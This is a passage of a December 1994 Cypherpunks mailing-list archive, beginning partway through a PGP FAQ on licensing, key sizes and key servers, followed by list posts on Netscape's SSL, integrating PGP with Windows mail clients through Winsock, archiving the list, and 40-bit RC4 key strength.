outside of the USA, even though the RSA patent does not. The IDEA conventional block cipher is covered by US Patent 5,214,703 and European patent EP 0 482 154 B1. IDEA is a trademark of Ascom-Tech AG. Commercial users of IDEA (including commercial use of PGP) may obtain licensing details from Ph. Baumann, Ascom Tech Ltd., IDEA Lizenz, Postfach 151, CH-4502 Solothurn, Switzerland, Tel ++41 65 242828, Fax ++41 65 242847. WHAT IS COMMERCIAL USE? Use some common sense. If you are running a business and using PGP to protect credit card numbers sent to you electronically, then you are using PGP commercially. Your customers, however, need not buy the commercial version of PGP just to buy something from you, if that is the only commercial use they make of PGP (since they are spending, not making, money with PGP). If you are just encrypting love letters or other personal mail (for which you don't get paid) on your own personal computer, that is not commercial. If you are encrypting official business mail on your for-profit corporation's computer with PGP, that is commercial use. Note that there are some gray areas not covered above, and the patent owners of RSA and IDEA may differ from my interpretation in the areas not covered above, so if you are in doubt, you should consider the licensing of Viacrypt PGP (or outside of North America, direct licensing of IDEA) to be cheap legal insurance. Indeed, the license fee is probably a lot cheaper than a legal opinion from a lawyer qualified to make such a judgement. Note that I am not a lawyer and the above is not legal advise. Use it at your own risk. WHAT IS THE "TIME BOMB" IN MIT PGP 2.6? There was a version byte change in MIT PGP 2.6 as of 1 September 1994. See ftp://ftp.csn.net/mpj/pgpbomb.asc for details. ARE MY KEYS COMPATIBLE WITH THE OTHER PGP VERSIONS? If your RSA key modulus length is less than or equal to 1024 bits (I don't recommend less, unless you have a really slow computer and little patience), and if your key was generated in the PKCS format, then it will work with any of the current PGP versions (MIT PGP 2.6, PGP 2.6ui, or Viacrypt PGP 2.7). If this is not the case, you really should generate a new key that qualifies. MIT PGP 2.6.2 should be able to use 2048 bit keys. Generation of 2048 bit keys is supposed to automatically be enabled in PGP 2.6.2 in December, 1994. By then, hopefully, most people will have had a chance to upgrade to a version of PGP that can use them, so longer keys won't be a big problem. On the other hand, 1024 bit keys are probably beyond the reach of most criminals and spies to break, anyway. MORE WORLD WIDE WEB URLs http://draco.centerline.com:8080/~franl/pgp/pgp-mac-faq-hinely.html http://draco.centerline.com:8080/~franl/pgp/pgp.html http://draco.centerline.com:8080/~franl/crypto/cryptography.html http://www.pegasus.esprit.ec.org/people/arne/pgp.html http://rschp2.anu.edu.au:8080/crypt.html http://ibd.ar.com/PublicKeys.html http://www.ifi.uio.no/~staalesc/PGPversions.html WINDOWS SHELLS Several shells for running PGP with Microsoft Windows are available at the same places PGP can be found. MACPGP KIT The MacPGP kit is a user interface for the Mac version of PGP. See ftp://ftp.netcom.com/pub/qw/qwerty ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGP_icons.sit.hqx ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkit.hqx ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkitSources.sit.hqx BUGS See the documentation that comes with PGP in the latest versions for bugs in the older versions. The latest versions of PGP may not fully wipe all traces of plain text from a file when given the -w option. For more information, see http://www.mit.edu:8001/people/warlord/pgp-faq.html BETSI - BELLCORE'S TRUSTED SOFTWARE INTEGRITY SYSTEM For information on this service, send mail to certify at bellcore.com with the subject help, or check http://info.bellcore.com/BETSI/betsi.html INTEGRATING PGP AND PINE Send blank e-mail to slutsky at lipschitz.sfasu.edu with Subject: mkpgp to get a c-shell script to interface PGP and Pine. Send a second message with Subject: addtomkpgplist if you want updates sent you automatically. HOW DO I PUBLISH MY PGP PUBLIC KEY? There are lots of ways. One way is to use a key server. Send mail to one of these addresses with the single word "help" in the subject line to find out how to use a key server. pgp-public-keys at pgp.iastate.edu public-key-server at pgp.ai.mit.edu pgp-public-keys at cs.tamu.edu pgp-public-keys at chao.sw.oz.au pgp-public-keys at jpunix.com pgp-public-keys at dsi.unimi.it pgp-public-keys at kiae.su pgp-public-keys at fbihh.informatik.uni-hamburg.de There is also an experimental public key server at http://ibd.ar.com/PublicKeys.html Another way is to upload it to the PGP public keys area of the Colorado Catacombs BBS (303-772-1062). Another way is to just send it to your correspondents. You could add it to your .plan file so that finger returns your key. You could add it to some of your postings. No matter which way you do it, you should have your key signed by someone who verifies that your key belongs to you, so that you don't have someone else generating a key that has your name on it, but that isn't yours. Here is my public key: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.7 mQCNAi4PT2QAAAEEAPPCZnrshEJ9PSnV+mXEwjM4kzJF0kyg2MnLMzo83vWI40ei jogncqdkXT0c2TQWg+Bsu9ckFoXdId0utumYv0aqd8yI/oU/DwJ1zJrqRL2PFbxe ZLofHoKFjvq1TiNiJq9ps3jW6iYS4IU1SzyKhjmyE+K0+WyrPPX0zg8FAL9FAAUR tCdNaWNoYWVsIFBhdWwgSm9obnNvbiA8bXBqQGNzbi5vcmc+IG1wajiJAJUCBRAu G3chZXmEuMepZt0BAZtAA/0Rw5mintlUDgHycNbeoyIiMHoLu8jWaCSaiGSt+dDU 1A/bUCo+gorv5TYxOClRf3XHjD6zSooWyUz3ehotrzPYLunhVOE2YBxPU+OvKFOc 37mcZrnXGBlF5NblnSYxp0186tGaTm7WMWx7NDlHT4GvhzHJQSOoo48ykDkKm/mk LIkAlQIFEC4PWbs/ZwY8hTPrxQEBKyMD/A7kv91C1ZZIRtkbC9k9lsWOgOnO8wG8 bGMajaco465Z5llWD+Y8QCMdSWcowtOBGfW0Wv1bZ1uebeCpg1L66pJ7C+BOExrk gPqRVCstLLiVerKGeSOZo3yXtxYKYX7mHQPrHp98ef7fUG4IiKS+S+znmGxpJwrV sHZRlhJ3hXUsiQCVAgUQLg9ZefX0zg8FAL9FAQFBTAQAh4u4Vun7WhPuL6fsXiXm paaGfeLtd3biRj/aOMAG1eHuhVdWejx71ormyKTdNB2YV56bpsE3JQ/KhBuYDo0N SkRnqeM2S+Ef7aZEg6Q44uXG52pqCZUldtCeYfOs3aLCR9SMlc6Y3zmpSwB1wKP0 5+tN9zruNYVKKBLWEIFAY7W0K01pY2hhZWwgUGF1bCBKb2huc29uIDxtLnAuam9o bnNvbkBpZWVlLm9yZz60IE1pY2hhZWwgSm9obnNvbiA8bXBqQG5ldGNvbS5jb20+ tChNaWtlIEpvaG5zb24gPDcxMzMxLjIzMzJAY29tcHVzZXJ2ZS5jb20+tCtNaWNo YWVsIFAuIEpvaG5zb24gPG1wam9obnNvQG55eC5jcy5kdS5lZHU+tC1EbyBub3Qg dXNlIGZvciBlbmNyeXB0aW9uIGFmdGVyIDI3IEp1bmUgMTk5Ni4= =rR4q - -----END PGP PUBLIC KEY BLOCK----- Permission is granted to distribute unmodified copies of this FAQ. To get the latest version of this FAQ, get ftp://ftp.netcom.com/pub/mp/mpj/getpgp.asc or send mail to ftp-request at netcom.com with the line SEND mp/mpj/getpgp.asc in the body of the message, or send blank mail to mpjohnso at nyx.cs.du.edu. There are many other frequently asked questions. Most of them are covered in the documentation that comes with PGP, and the few that aren't are addressed in documents referenced above. ___________________________________________________________ |\ /| | | | | \/ |o| | Michael Paul Johnson Colorado Catacombs BBS 303-772-1062 | | | | / _ | mpj at csn.org aka mpj at netcom.com m.p.johnson at ieee.org | | |||/ /_\ | ftp://ftp.csn.net/mpj/README.MPJ CIS: 71331,2332 | | |||\ ( | ftp://ftp.netcom.com/pub/mp/mpj/README -. --- ----- .... | | ||| \ \_/ |___________________________________________________________| -----BEGIN PGP SIGNATURE----- Version: 2.7 iQCVAgUBLu3WLvX0zg8FAL9FAQEoEQP+JPh4RjUf5TEvEgdTTOlfMQKo8oFThOPU zWbmWjc4Cs4HTtHK1hs0dLagTCr/TPYA08ue87aiyp5gtMadXJNE0cu9313LzRby 5V6PpmWlAdz2kFCVGTP2BFwS9lajmCGOo4YcIUj/HS6ClKXznIYgg2OPCzJxrLqG UfeQ6m1d22Y= =AG35 -----END PGP SIGNATURE----- From xpat at vm1.spcs.umn.edu Tue Dec 13 13:12:29 1994 From: xpat at vm1.spcs.umn.edu (xpat at vm1.spcs.umn.edu) Date: Tue, 13 Dec 94 13:12:29 PST Subject: HyperAccess for Windows 2.0 advertises RSA encryption Message-ID: <9412132111.AA11824@toad.com> Recently received an offer from Hilgraeve, producer of HyperAccess for Windows 2.0. (800) 826-2760 I quote the brochure "Enjoy easier, safer, more secure file transfers with amazing Hyperprotocol enhancements: Autostart, Smart Crash Recovery, and RSA Encryption" "Exchange files containing sensitive data through public data channels (local phone lines, long distance carriers, cellular, or wireless) with complete confidence, using state-of-the-art RSA encryption." Any comments on what they are up to? This is the same company who sent my friend the previous version of the package and told her fer sure fer sure it had full 3270 emulation, but turned out to be a VT100 session with some keyboard remapping to simulate PFkeys. She had to call them twice for her 60 day guaranteed refund. ----------------------------------------------------------------------------- P M Dierking xpat at vm1.spcs.umn.edu | finger for endless frustration W.A.S.T.E From m5 at vail.tivoli.com Tue Dec 13 13:12:34 1994 From: m5 at vail.tivoli.com (Mike McNally) Date: Tue, 13 Dec 94 13:12:34 PST Subject: BofA+Netscape In-Reply-To: Message-ID: <9412132110.AA11186@vail.tivoli.com> Johnathan Corgan writes: > > Is that the same Microsoft that brought us Edlin??? > > Wasn't edlin based on the Unix ed? No. Or at least, if it was, the edlin implementor had some serious misunderstandings. | GOOD TIME FOR MOVIE - GOING ||| Mike McNally | | TAKE TWA TO CAIRO. ||| Tivoli Systems, Austin, TX: | | (actual fortune cookie) ||| "Like A Little Bit of Semi-Heaven" | From wessorh at ar.com Tue Dec 13 13:18:53 1994 From: wessorh at ar.com (Rick H. Wesson) Date: Tue, 13 Dec 94 13:18:53 PST Subject: calling all cpunks on netcom Message-ID: <199412132112.NAA20077@ar.com> > From owner-cypherpunks at toad.com Tue Dec 13 13:04 PST 1994 > Date: Tue, 13 Dec 1994 11:46:14 -0800 > From: srikar at netcom.com (Shrieks) > Message-Id: <199412131946.LAA26053 at netcom20.netcom.com> > To: cypherpunks at toad.com > Subject: calling all cpunks on netcom > Sender: owner-cypherpunks at toad.com > > > Hi all, > > Just floating a trial balloon. Are you tired of the high traffic on > the cypherpunks list and having to wade through a ton of mail every > day? Any of you folks approaching your 5M limit from archiving too > many messages? Well, I am and I don't really want to start paying > for the extra memory. ever tried to get netcom to do anything for you? > I was wondering if it might be worth petitioning the netcom sysadmins > to start up a local newsgroup (eg. netcom.cpunks) that serves as an > archive for the mailing list. That way one gets to use the abilities > of to keep threads together > and so forth. I'm sure there are enough netcom subscribers to warrant this. I'm working on a system that indexes,marks up, and serves up html versions of E-Mail lists. It's still very alpha stuff. cypherpunks is in the tryal part of system I call the Biblotech. All URL's that come through the system are also indexed... It's not tiny stuff Sybase, Verity search engine etc are all involved. Would anyone be against me doing such a thing? alowing anyone to view the c-punks list via html etc... -Rick From rishab at dxm.ernet.in Tue Dec 13 13:21:33 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Tue, 13 Dec 94 13:21:33 PST Subject: Elliptic crypto is patented Message-ID: Eric asks whether elliptic encryption might not be a solution to the world's patenting woes. Last April, schirado at lab.cc.wmich.edu (Schirado) asked whether anyone was interested in trying an implementation. I was relatively free of work at that time, and volunteered. Then I got busy; IAC it appeared far too slow for software. Read: _An Implementation of Elliptic Curve Cryptosystems Over F-2-155_ , IEEE Journal on Selected Areas in Communications, Vol. 11, #5, June 1993 (page 804). Incidentally Next Computer's Fast Elliptic Encryption, FEE, used elliptic curves, and is patented (by R E Crandell, USP# 5,159,632,27 October 1992); also, elliptic crypto is probably covered by the DH/PKP patents. "We know everything about you that we need to know" - Coleta Brueck, IRS ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Tue Dec 13 13:21:35 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Tue, 13 Dec 94 13:21:35 PST Subject: Academic crypto export over e-mail? Message-ID: mpj at csn.org: > be other restrictions that I am not aware of to your using it. The C++ code > fragment above is just intended to illustrate the algorithm being discussed, > and is not a complete application. I understand this document to be > Constitutionally protected publication, and not a munition, but don't blame > me if it explodes or has toxic side effects. Eeek! My skin just peeled off! Seriously, I thought the whole ITAR hassle was that 'code fragments' intended to 'illustrate algorithms' are only exportable on paper? After all Mike Ingle can't sent me his Perl RSA libraries to 'illustrate cryptographic prototyping techinques' even though the libraries don't run on their own. "We know everything about you that we need to know" - Coleta Brueck, IRS ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Tue Dec 13 13:21:36 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Tue, 13 Dec 94 13:21:36 PST Subject: Transport layer security in a Freeh country Message-ID: It's nice to see some technical discussion for a change. I guess one reason transport layer security seems irrelevant to Cypherpunks is that it isn't secure. Not necessarily from a cryptographic point of view, but in its procedure. For example, the Digital Telephony Bill avoided acting against Internet providers _this_ time. Being provided by the carrier, transport-layer security is succeptable to LEA arm-twisting. It may be so even now despite DT's current form. Such sabotaging of end-to-end security is much tougher, if not impossible, and with end-to-end security, transport security is redundant and possibly a painful overhead. (This is quite apart from the other hassles - proxies need to be changed etc - which only exist with transport security.) As for James Donald's criticism of the IETF for not extending HTML to support end-to-end security, well, MIME already exists. "We know everything about you that we need to know" - Coleta Brueck, IRS ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From perry at imsi.com Tue Dec 13 13:37:04 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 13:37:04 PST Subject: IPSP and Netscape In-Reply-To: <199412131952.LAA02566@netcom10.netcom.com> Message-ID: <9412132136.AA13061@snark.imsi.com> James A. Donald says: > Eric Hughes wrote: > > > ... the claims that SSL is better than anything > > > else out there > > Marc Andreessen writes > > I'm sorry, I don't remember such a claim being made. > > Eric and Perry have repeatedly used this method - > not only attacking a straw man, but lying outright > that their opponent has *explicitly* proclaimed > the straw man. > > I am thoroughly sick of this dishonest debating > tactic. We're sick of you inventing facts, but of course, you'll just claim we've been doing that. .pm From adam at bwh.harvard.edu Tue Dec 13 13:38:59 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Tue, 13 Dec 94 13:38:59 PST Subject: Winsock & PGP Integration In-Reply-To: Message-ID: <199412132137.QAA26168@bwnmr5.bwh.harvard.edu> Seems to me that the UNIX model of building one mail transport instead of 20 is a good one. If you seperate out the UA from the transport, you make it easy to fix or update the transport. So I would suggest, rather than hacking at Winsock and hoping to catch the right protocols, build a set of libraries that can be called by programs. smtp.dll, for example, would be a mailer that any mail program could call. nntp.dll would handle news, underneath all the various interfaces. If you want to pretend to be premail, you do it in smtp.dll. The advantage to other programmers is that they no longer have to do the low level stuff that they had to before. It allows programmers build whats interesting, namely, the interface & gizmos. Make the package do the user interface side of things, and make a seperate package to do the network protocols. Makes building, testing, and changing things a lot easier. And while you're at it, store all of your files as text. :) adam Johnathan Corgan wrote: | On a Un*x machine, premail works by impersonating the mail | transfer agent and intercepting the flow of mail in each | direction, adding encryption, signing, and anonymous remail | services in a rather elegant fashion. As the mail system under | Un*x (indeed, the entire OS) is designed to be a "piped and glued | together" batch of smaller utilities, premail's method works well | and is very 'unix-like'. | | How to achieve the same under Windows with winsock based SLIP or | PPP access? The various mail agents such as Eudora and Chameleon | are integrated packages that do everything from using SMTP and POP | for mail transfer to providing the user agent that reads and | writes mail. There really is no simple way to wedge into the | package and replace or supplement functionality. | | Except one. What all of these agents have in common is that they | interface with the Windows Sockets API to establish TCP streams | that are used in the POP and SMTP protocols. Since these are well | known and standardized protocols, this gives us our toehold. -- "It is seldom that liberty of any kind is lost all at once." -Hume From jrochkin at cs.oberlin.edu Tue Dec 13 13:42:11 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Tue, 13 Dec 94 13:42:11 PST Subject: bashing mcom Message-ID: Can we maybe discuss other things then how Mcom fucked up? They've said specifically that they plan to support IPSP as soon as it is viable to do so. They've said they plan to support whatever MIME encryption thingamajigs exist, as soon as they are standardized. [And don't get mad at them for waiting for it to become standardized when their own protocol isn't. I have talked with someone developing commercial software who spent some serious time writing stuff to handle MIME encryption, only to have the specs change on him significantly.] Now, maybe they are lying about this. But you aren't going to get anything else out of them on this list. They've come as close as they are going to to admitting they made a mistake with SSL. I believe a good paraphrase of what wa said (I didnt' keep a copy of the message) was that "however it looks now, SSL made sense at the time, and it's a done thing now." Maybe they are only saying this much to appease the list, but again, that's all you are going to get out of them. It seems like it would be an impossibility economically and public-relations-ly for them to just abandom SSL, and they probably dont' want to either. But they've said that they plan on supporting IPSP, MIME encryption stuff, and anything else out there that will do the job. I'm not sure what else you want to drag out of them. Can we maybe stop this flame fest and let the list return to it's normal traffic levels? From amanda at intercon.com Tue Dec 13 13:46:08 1994 From: amanda at intercon.com (Amanda Walker) Date: Tue, 13 Dec 94 13:46:08 PST Subject: Authentication vs encryption: CPs on the web Message-ID: <9412131646.AA13156@amanda.dial.intercon.com> > I notice that the people who come to this topic from an > institutional point of view tend to be more interested in > the authentication aspects. > This seems to fit better into the control-oriented mindset. > With authentication you can track what people are doing > better; non-repudiable signatures could actually work in some ways > against the signer. I think that may be one reason Phil Zimmermann > is famous for not signing his messages. :-) But encryption can > actually work against institutional interests (compared to individual > ones) by making it harder to keep track of people's activities. Very much agreed. This is why, in my description of the rough criteria I sent out, I included mention of self-signed certificates (which only show that you do in fact have the private key corresponding to a given public key), bare keys, and so on. There clearly needs to be facilities for encrypted anonymous use. To expand on my example of wanting sales literature to be signed so I know it's genuine, I correspondingly *don't* want to include a certificate with identifying information in my own query--I get enough junk mail already, and I don't want vendors to be able to capture market research at the browsing level (I haven't looked at WIRED's server for precisely this reason). Amanda Walker InterCon Systems Corporation From jcorgan at netcom.com Tue Dec 13 13:49:49 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Tue, 13 Dec 94 13:49:49 PST Subject: Winsock & PGP Integration Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > Except one. What all of these agents have in common is that they > interface with the Windows Sockets API to establish TCP streams > that are used in the POP and SMTP protocols. Since these are well > known and standardized protocols, this gives us our toehold. > >How might an interposed winsock DLL recognize what high level protocol >it was going to spoof? Getting the port number will be a very good >approximation, but I'm not convinced of its reliability. Well, it could be done "by definition." Let's say I tell my Eudora that the SMTP and POP address to use is 192.0.0.1. I can now configure my spoofing agent that when there is an attempt to establish a TCP stream on port 110 of 192.0.0.1, I can be assured that it is the mailer trying to retrieve mail. Likewise for mail delivery (and news, spoofing NNTP, though this is probably an order of magnitude more complicated than just mail.) >As to the general issue of MSWindows v. Unix, the Unix predominance >for remailer software involves the fact that Unix is on the bulk of >the machines connected to the Internet. It's more reliable for >offering network services than MSWindows and it's got a cleaner >architecture for reconfiguration. None of these explanations, >however, means that there won't be more MSWindows that Unix boxes for >a long time. Of course. Unix was around long before DOS/Windows gained market dominance of the personal computing market. And for automated encryption on that platform, premail seems to do a great job (though there are some features I'd like to see added, Raph). The unfortunate thing I think is that Unix/X-Windows has never gained a foothold in the "consumer" market. - From a marketing perspective, if we are trying to "sell" strong crypto use to the "masses", then it is only prudent to assess where these types of products would be deployed. And the two platforms that will entirely make up the personal computing market will be DOS/Windows95 and to a lesser extent, OS/2 Warp. This was a subject brought up at the last Cypherpunks meeting (by Tim, I think.) For fifteen years we have had some pretty sophisticated theoretical models of strong cryptographic techniques. Some of these, such as PK encryption, have reached the "masses" in the form of PGP. Others, such as digital cash, have been mired in implementation issues. It is frustrating to read about and listen to lectures on advanced cryptographic subjects (such as all the great presentations at the last meeting), knowing that it may be years before this "theory" makes it into "practice." I will be happy when cryptography is as ubiquitous on a PC as screen savers. ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu3ksU1Diok8GKihAQFyXwQApqXdcRfM7cV2EeRbrB6xMDXwJwWSFl5i 3gwTwDkZ8omK/9N+R9gLx4V6CcpPo7kku+GfUy7dkj4wDYtLTZ7m2sZ+mvg0FJNS 3LUSOKC911LpGj9m7uUcFKF+OsthO7WDz5Xtk5AMUTK26Uo0W4lOxBgOTrdiCdDx q3rYla9+ueU= =TL0Z -----END PGP SIGNATURE----- From tcmay at netcom.com Tue Dec 13 13:50:41 1994 From: tcmay at netcom.com (Timothy C. May) Date: Tue, 13 Dec 94 13:50:41 PST Subject: calling all cpunks on netcom In-Reply-To: <199412131946.LAA26053@netcom20.netcom.com> Message-ID: <199412132147.NAA13766@netcom12.netcom.com> Shrieks wrote: > Just floating a trial balloon. Are you tired of the high traffic on > the cypherpunks list and having to wade through a ton of mail every > day? Any of you folks approaching your 5M limit from archiving too > many messages? Well, I am and I don't really want to start paying > for the extra memory. I ruthlessly cut out messages I don't want to keep, but still have accumulated about 60-100 MB of Cypherpunks mail that I wish to keep (not as mail qua mail, but as articles, essays, comments on crypto points, forwarded items, etc.. Obviously I have this stuff on my home machine. My point? Netcom's "5 MB" limit is useless for actually archiving articles, as it probably should be. At some point one has to download the accumulated stuff. A 5 MB buffer is better than a 1 MB buffer, but not in the steady state solution. Conclusion: The remote vs. local storage problem has to be resolved in any case, so why not solve it sooner rather than later? > I was wondering if it might be worth petitioning the netcom sysadmins > to start up a local newsgroup (eg. netcom.cpunks) that serves as an > archive for the mailing list. That way one gets to use the abilities > of to keep threads together > and so forth. I'm sure there are enough netcom subscribers to warrant this. Netcom expires _all_ newsgroups, even its own ("netcom.*" local discussion groups), in the "normal" period of 2-3 weeks. There is no reason to expect them to make an exception for our group. If this is not made an exception, then a 3-week hang around period will hardly constitute an "archive." (Yes, it will reduce _some_ storage, by a shared pool, but only temporarily.) Netcom might be persuaded to create a persistent storage for a discussion group like ours, but I know of no precedents (at Netcom). They would want to be paid somehow for the space used, and arguments that users would not have to pay extra for the above-5MB storage would not be very persuasive to them. (Unlike MIT, for example, Netcom has little incentive in this area.) Convincing them to create another class of service or pricing would be tough, I think. I have no objection to the idea of this, and the general idea of converting the list into a newsgroup (alt.cypherpunks, or soc.cypherpunks, or even rec.flame.cypherpunks) comes up. I just don't think the argument that it saves disk space is very persuasive. At some point the stuff one wants to keep needs to be on one's own machine, right? (There may be some list members who lack a computer, and are accessing solely via terminals. Can't do much for them.) > Just a thought. Pheedback? --Tim May, in his third year of using Netcom with the Cypherpunks list. -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From amanda at intercon.com Tue Dec 13 13:56:43 1994 From: amanda at intercon.com (Amanda Walker) Date: Tue, 13 Dec 94 13:56:43 PST Subject: Clarification of my remarks about Netscape Message-ID: <9412131653.AA45063@amanda.dial.intercon.com> > I didn't bother imbedding the RSA Unaffiliated User CA because I > didn't think server operators would use it to get certificates. Well, it's what Apple is using for PowerTalk signers (which are a key pair and X.509 certificates, by default from the Unaffiliated User PCA). It makes sense for personal (as opposed to organizational) servers, such as someone running MacHTTP for their home page... On the other hand, if RSA has set up a server PCA, that should be suffcient for now. I wonder what the certification policy is, though--how do you prove that you control a given server? For an Unaffiliated User CA certificate, you just have to show a notarized application and two forms of ID, one with a photo (driver's license, passport, etc.). I can't off hand think of an equivalently strong way to ID control of a server... Amanda Walker InterCon Systems Corporation From mpjohnso at nyx10.cs.du.edu Tue Dec 13 14:00:18 1994 From: mpjohnso at nyx10.cs.du.edu (Michael Johnson) Date: Tue, 13 Dec 94 14:00:18 PST Subject: More 40-bit RC4 nonsense In-Reply-To: <199412131742.JAA27330@netcom5.netcom.com> Message-ID: <9412132159.AA08756@nyx10.cs.du.edu> Raph Levien writes: > If I recall correctly, the first byte out of the RC4 stream has >about a 40% chance of being the first byte of the key. Thus, if the >40-bit "secret" part of the key is the _beginning_ of the full 128-bit >key, then the keyspace is effectively reduced by about seven bits, >meaning that I would be able to crack a key on my PC in a couple of >days or so. > Of course, if the "clear" 88 bits went first, there would be no >advantage whatsoever. The SSL document very carefully does not say >how they combine the two key parts to form the 128-bit key. Does >anyone know? Why did the NSA require that an application using the Sapphire Stream Cipher be limited to a _32-bit_ session key instead of the well-known _40-bit_ limit for RC4? I wonder if there are other key bit leaks that cover the other 60%? Hmmm.... From jcorgan at netcom.com Tue Dec 13 14:14:25 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Tue, 13 Dec 94 14:14:25 PST Subject: Winsock & PGP Integration Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > Seems to me that the UNIX model of building one mail transport >instead of 20 is a good one. If you seperate out the UA from the >transport, you make it easy to fix or update the transport. I agree. > So I would suggest, rather than hacking at Winsock and >hoping to catch the right protocols, build a set of libraries that can >be called by programs. smtp.dll, for example, would be a mailer that >any mail program could call. nntp.dll would handle news, underneath >all the various interfaces. If you want to pretend to be premail, you >do it in smtp.dll. This is of course much closer to the ideal way of doing things. However, the original motivation for this project was that in order for all existing Winsock based mail agents (except for Zmail, it looks like now) to add crypto/anonymity to their functionality, some work has to be done to change them. The system I came up with to spoof Winsock would be (hopefully!) transparent, in that it would work with _existing_ mailers _today_. To go the route you outlined, while in the long run a much more sensible way of doing things, would require the same sort of effort on the part of the current mail agents, i.e., they would need to change. Your suggestion is one I would like to follow up on; in the mean time, I am going to make an attempt at the spoofing idea. > The advantage to other programmers is that they no longer have >to do the low level stuff that they had to before. It allows >programmers build whats interesting, namely, the interface & gizmos. Hehe. It's the user interface I hate doing the most! > Make the package do the user interface side of things, and >make a seperate package to do the network protocols. Makes building, >testing, and changing things a lot easier. And while you're at it, >store all of your files as text. :) Nah. Variable bit sized binary records work well enough :) ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu4cV01Diok8GKihAQEQqwP/T1XQPJYPHyVZWB3sAO1Fl8TdgikW+I/6 1/XnNitgm7WwwUdadGFx0gVEzbmwN0yRbwntKV/M8wuYG+0oQ2NPBBSoBDMbUYqR OmIjUDg7P+v7X4Ga4B6MLeca6bemxYGT+Jv3F4xTQrohyUyNc+zMBR6CPWrv5d7g NQzIeTsIn/M= =Tagz -----END PGP SIGNATURE----- From mccoy at io.com Tue Dec 13 14:18:53 1994 From: mccoy at io.com (Jim McCoy) Date: Tue, 13 Dec 94 14:18:53 PST Subject: BofA+Netscape In-Reply-To: <199412131914.LAA26551@netcom10.netcom.com> Message-ID: <199412132218.QAA06065@pentagon.io.com> jamesd at netcom.com (James A. Donald) writes: [regarding Netscape and IETF work...] > > Perry, they are not in trouble. They are the number one supplier > of the internet killer app. They are the supplier of the current app-du-jour. What things look lie in five months is another issue completely. > The plug for crypto that they have placed in Netscape 0.96 is > the number one force bringing crypto awareness to the masses. Increasing use of PGP is the number one force bringing crypto awareness to the masses, Netscape is just bringing bad crypto to the masses. > He said that Netscape would look at IPSP when it was beyond > the "near" phase. [...] The correct response is "Gee that is great. > Here are some working demo systems, and some slabs of documentation." No, the correct response is to stop idotic measures before the build up enough inertia behind them to make it difficult to prevent mistakes from being made. It is interesting that the creators of Netscape quite frequently harp on "it is us against the goliath of Microsoft, so we deserve the support of the net" and then they go out and do exactly the sort of thing that makes Microsoft so unpopular; they take advantage of thier market position to force bad technology on others. jim From lmccarth at bali.cs.umass.edu Tue Dec 13 14:25:17 1994 From: lmccarth at bali.cs.umass.edu (L. McCarthy) Date: Tue, 13 Dec 94 14:25:17 PST Subject: archiving cpunks Message-ID: <199412132229.RAA08472@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- > I'm working on a system that indexes,marks up, and serves up html versions > of E-Mail lists. It's still very alpha stuff. cypherpunks is in the > tryal part of system I call the Biblotech. All URL's that come through > the system are also indexed... [...] > Would anyone be against me doing such a thing? alowing anyone to > view the c-punks list via html etc... The list is public and has been archived before (and maybe still is, I'm not clear on the point). Hence I don't see any grounds for objecting to your project. - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLu4dtmf7YYibNzjpAQFkNwP/XCHjzLX8Y5VCPTsDRMnP+sc41Koe7acQ RDfT6Ojgb/Fb6rtYiBjn9aSIu57kza5rSYjVmaKljM06p2QptZ2M1Jz9jxU7rfNk BHVJSAc2Y+kbu0KqVzAVgx4o5GC41BnCoJiB9/l8iWvIgkO5pvSHTO3LlrgD15+6 kjlS5fq664Y= =nr2r - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service 